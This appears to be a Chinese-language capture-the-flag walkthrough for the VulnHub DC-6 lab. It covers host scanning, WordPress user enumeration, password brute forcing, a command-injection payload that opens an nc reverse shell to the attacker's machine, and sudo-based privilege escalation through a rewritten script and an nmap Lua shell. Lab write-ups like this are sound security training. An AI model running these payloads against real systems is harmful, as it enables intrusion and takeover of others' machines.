1.环境搭建
靶机下载:https://www.vulnhub.com/entry/dc-6,315/
将靶机导入Oracle VM VirtualBox中,使用仅主机模式,网卡使用和kali相同的网卡
开启靶机
2.渗透过程
使用nmap进行主机发现扫描
nmap -sn 192.168.56.0/24
使用nmap进行端口扫描
nmap -sS 192.168.56.111
发现22和80端口,使用浏览器访问80端口
访问失败,修改/etc/hosts文件
vim /etc/hosts
修改后再进行访问,访问成功
使用dirb进行web目录扫描
dirb http://192.168.56.111
发现后台登录系统
查看网站指纹
这是一个wordpress的CMS框架,版本是5.1.1,使用wpscan工具爆破用户名
wpscan --url http://192.168.56.111 -e u
枚举出来五个用户名
admin
graham
sarah
mark
jens
将他们放到一个文件中
cat user.txt
使用wpscan爆破密码
wpscan --url http://wordy -U user.txt -P /usr/share/wordlists/rockyou.txt
爆破出用户名mark,密码helpdesk01,进行登录
登录成功,点击页面功能,发现一个命令执行漏洞
127.0.0.1;ls
使用nc进行监听端口
nc -lvp 6666
进行反弹shell
127.0.0.1;nc -e /bin/bash 192.168.56.102 6666
反弹shell成功
使用python切换模式
python -c "impport pty;pty.spawn('/bin/bash');"
在/home/mark/stuff下有一个文件,打开该文件
发现了graham用户的密码,切换用户
切换成功,使用sudo -l查看该用户的授权
sudo -l
发现可以执行bachups.sh文件,向文件中写入“/bin/bash”
echo "/bin/bash" > /home/jens/backups.sh
执行该文件
sudo -u jens /home/jens/backups.sh
成功切换到jens用户,使用sudo -l查看该用户的授权
sudo -l
发现可以执行nmap,将os.execute('/bin/bash')写入shell文件
echo "os.execute('/bin/bash')" > shell
写入失败,报错没有权限,切换到/home/jens下,再次写入
echo "os.execute('/bin/bash')" > shell
sudo nmap --script=shell
提权成功,查看flag